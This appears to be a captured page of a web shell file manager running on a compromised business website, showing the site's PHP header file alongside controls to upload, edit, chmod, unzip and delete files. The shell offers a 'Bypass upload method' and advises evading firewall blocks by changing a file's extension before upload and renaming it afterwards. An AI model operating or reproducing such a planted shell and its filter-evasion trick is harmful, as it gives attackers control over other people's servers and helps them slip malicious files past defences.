Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
vhosts
sarainternational.ae
httpdocs
include
File Content:
header.php
<?php include('admin/connection.php'); $page= basename($_SERVER['PHP_SELF'],".php"); ?> <!doctype html> <html class="no-js" lang="zxx"> <head> <?php include('include/head.php'); ?> <!-- CSS here --> <link rel="stylesheet" href="assets/css/owl.carousel.min.css"> <link rel="stylesheet" href="assets/css/fontawesome-all.min.css"> <link rel="stylesheet" href="assets/css/meanmenu.css"> <link rel="stylesheet" href="assets/css/slick.css"> <link rel="stylesheet" href="assets/css/main.css"> <link rel="stylesheet" href="assets/css/responsive.css"> </head> <body> <style> @media only screen and (max-width: 991px) { .media { display :none; } } @media only screen and (min-width: 992px) { .media2 { display :none!important; } } .slick-dots { text-align: center; margin: 0 0 10px 0; padding: 0; li { display:inline-block; margin-left: 4px; margin-right: 4px; &.slick-active { button { background-color:black; } } button { font: 0/0 a; text-shadow: none; color: transparent; background-color:#999; border:none; width: 15px; height: 15px; border-radius:50%; } :hover{ background-color: black; } } } /* Custom Arrow */ .prev{ color: #999; position: absolute; top: 38%; left: -2em; font-size: 1.5em; :hover{ cursor: pointer; color: black; } } .next{ color: #999; position: absolute; top: 38%; right: -2em; font-size: 1.5em; :hover{ cursor: pointer; color: black; } } @media screen and (max-width: 800px) { .next { display: none !important; } } </style> <!-- header-start --> <header> <div id="sticky-header" class="main-menu-area menu-01 pl-165 pr-165"> <div class="container-fluid"> <div class="row align-items-center"> <div class="col-xl-3 col-lg-3"> <div class="logo"> <a href="index.php"><img src="assets/img/sara-logo.jpeg" alt="" /></a> </div> </div> <div class="col-xl-9 col-lg-9 d-none d-lg-block"> <div class="header-right f-right"> <div class="menu-bar info-bar f-right d-none d-md-none d-lg-block"> <a href="#"><i class="fal fa-bars"></i></a> </div> <div class="header-search f-right d-none d-xl-block"> <form class="header-search-form" action="searchlisting.php" method="post"> <input placeholder="Search" type="text" name="searchlist" id="searchlist" required> <button type="submit"><i class="far fa-search"></i></button> </form> </div> </div> <div class="main-menu"> <nav id="mobile-menu"> <ul> <li class="<?= ($page=="index")? 'active':''; ?>"><a href="index.php">Home</a> </li> <li class="<?= ($page=="about")? 'active':''; ?>"><a href="about.php">About Us</a></li> <li class="<?= ($page=="products")? 'active':''; ?> media2"><a href="products.php">Products</a> <ul class="sub-menu text-left megamenu summary"> <?php $sql = "select * from category ORDER BY categoryName ASC"; $query = mysqli_query($conn, $sql); while($row = mysqli_fetch_array($query)){ ?> <div class="col-lg-4 col-sm-12" ><a href="listing.php?category=<?= $row['id']?>"><?= $row['categoryName']?></a></div> <?php } ?> </ul> </li> <li class="<?= ($page=="products")? 'active':''; ?> media"><a href="products.php">Products</a> <?php $sql = "SELECT * FROM category ORDER BY categoryName ASC"; $result = $conn->query($sql); $items = []; if ($result->num_rows > 0) { // Fetch all rows into an array while ($row = $result->fetch_assoc()) { $items[] = $row; } } else { echo "0 results"; } // Process items into columns $columns = array_chunk($items, 10); // Split items into chunks of 10 // print_r($columns); ?> <div class="sub-menu text-left summary mega-menu d-md-flex" > <?php foreach ($columns as $column): ?> <ul> <?php foreach ($column as $item): ?> <li style="text-transform: capitalize; margin:5px;"><a href="listing.php?category=<?= $item['id']?>"><?= htmlspecialchars($item['categoryName']) ?></a></li> <?php endforeach; ?> </ul> <?php endforeach;?> </div> </li> <li class="<?= ($page=="certifications")? 'active':''; ?>"><a href="certifications.php">Certifications </a></li> <li class="<?= ($page=="contact")? 'active':''; ?>"><a href="contact.php">Contact Us</a></li> </ul> </nav> </div> </div> <div class="col-12"> <div class="mobile-menu"></div> </div> </div> </div> </div> <div class="extra-info"> <div class="close-icon"> <button> <i class="far fa-window-close"></i> </button> </div> <div class="logo-side mb-30"> <a href="index.php"> <img src="assets/img/sara-logo2.jpeg" alt="logo" style="width:160px;height:auto;"/> </a> </div> <div class="side-info mb-30"> <div class="contact-list mb-30"> <h4>Office Address</h4> <p>Sara International FZE Office No. : FZJOAB2010 Jafza One, Jabel Ali Free Zone, Dubai, United Arab Emirates</p> </div> <div class="contact-list mb-30"> <h4>Phone Number</h4> <p><a href="tel:+971-522782617">+971-522782617</a></p> </div> <div class="contact-list mb-30"> <h4>Email Address</h4> <p><a href="mailto:info@sarainternational.ae" >info@sarainternational.ae</a></p> </div> </div> <div class="social-icon-right mt-20"> <a href="#"> <i class="fab fa-facebook-f soc-icon" style="color:#2f55a4;"></i> </a> <a href="#"> <i class="fab fa-twitter soc-icon" style="color:#00acee"></i> </a> <a href="#"> <i class="fab fa-google-plus-g soc-icon" style="color:#db4a39;"></i> </a> <a href="#"> <i class="fab fa-instagram soc-icon" style="color:#F56040;"></i> </a> </div> </div> </header> <!-- header-start -->
Edit
Download
Unzip
Chmod
Delete